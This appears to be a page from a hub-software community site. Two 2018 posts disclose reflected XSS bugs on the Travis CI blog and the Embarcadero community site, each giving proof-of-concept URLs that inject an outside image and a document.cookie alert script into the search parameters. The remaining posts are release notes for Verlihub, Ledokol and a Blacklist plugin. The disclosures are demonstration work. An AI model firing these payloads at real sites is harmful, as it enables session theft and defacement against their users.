Travis CI blog XSS bug

Vulnerable page: https://blog.travis-ci.com/

PoC
https://blog.travis-ci.com/search?q="><img src=http://www.te-home.net/gallery/xssd_by_teamelite.png>

PoC
https://blog.travis-ci.com/search?q="><script>alert(document.cookie)</script>

You can either include any XSS code in search input box, or request any XSS code directly using GET method and q parameter.





Note: This is a proof of concept and it doesn't reflect the views or interests of above websites.
Posted by RoLex on 2018-02-24 22:540 comments2 likes

Embarcadero community XSS bug

Vulnerable page: https://community.embarcadero.com/

PoC
https://community.embarcadero.com/blogs/blog-menu?search="><img src=http://www.te-home.net/gallery/xssd_by_teamelite.png>

PoC
https://community.embarcadero.com/blogs/blog-menu?search="><script>alert(document.cookie)</script>

You can either include any XSS code in search input box, or request any XSS code directly using GET method and search parameter.





Note: This is a proof of concept and it doesn't reflect the views or interests of above websites.
Posted by RoLex on 2018-02-24 13:470 comments2 likes

Verlihub 1.1.0.0

Changes in 1.1.0.0
Commit log: https://github.com/verlihub/verlihub/commits/master

File information: Verlihub 1.1.0.0
Posted by verlihub on 2018-02-19 14:180 comments2 likes

Ledokol 2.9.5.70

Changes in 2.9.5.70
[ 63] Fixed: Operator list appearance after removing user with opkeyclass condition, report by KCAHDEP
[ 64] Added: CTM uptime with actions
[ 65] Added: More keywords to AVDB search server requests
[ 65] Added: Optional path parameter to avdetforce command
[ 66] Added: Command notification for custom nick change, request by KCAHDEP
[ 67] Added: Main chat rank prize as higher user class defined by configuration, idea by Foxtrot
[ 68] Added: Updated country code list after MaxMindDB names
[ 69] Added: Search and CTM uptime user message control, request by KCAHDEP

File information: Ledokol 2.9.5.70
Posted by ledokol on 2018-02-19 13:490 comments2 likes

Blacklist 1.2.3.2

Changes in 1.2.3.2
# 1.2.2.7 - Added country code translation to some messages
# 1.2.2.8 - Added "prox_quote" configuration to limit amount of public proxy lookups per day
# 1.2.2.9 - Added prioritization of public proxy and my lists
# 1.2.2.9 - Removed break on first match
# 1.2.2.9 - Added "prox_getasn" configuration to show GeoIP ASN information on proxy detection
# 1.2.2.9 - Added "extry_getasn" configuration to show GeoIP ASN information on exception lookup
# 1.2.3.0 - Added "myoff" and "exoff" commands to disable or enable items in my and exception lists
# 1.2.3.0 - Added results from my list to find action
# 1.2.3.0 - Added ASN check on connection
# 1.2.3.1 - Added "asn_block" configuration for space separated list of blocked AS numbers
# 1.2.3.1 - Added "asn_except" configuration for space separated list of excepted AS numbers
# 1.2.3.2 - Added "nick_skip" configuration for space separated list of users to skip proxy lookup

File information: Blacklist 1.2.3.2
Posted by vhpython on 2018-02-19 13:210 comments2 likes
« Back • 1 • Next »